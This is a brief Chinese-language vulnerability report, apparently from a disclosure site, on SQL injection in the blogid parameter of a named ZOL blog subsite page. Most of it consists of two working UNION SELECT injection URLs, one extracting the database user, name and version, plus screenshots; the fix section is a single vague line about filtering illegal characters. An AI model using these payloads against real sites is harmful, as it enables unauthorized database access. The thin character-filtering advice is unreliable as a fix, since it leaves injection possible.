中关村在线博客子站SQL注入及修复方案
人气:0http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,3,4,5--
![](https://img.qb5200.com/download-x/20201204/290560.jpg)
http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,CONCAT(user(),0x7c,database(),0x7c,version()),4,5--
![](https://img.qb5200.com/download-x/20201204/290561.jpg)
![](https://img.qb5200.com/download-x/20201204/290562.jpg)
![](https://img.qb5200.com/download-x/20201204/290563.jpg)
修复方案:
过滤参数提交非法字符或者拦截敏感字符等等。。。
加载全部内容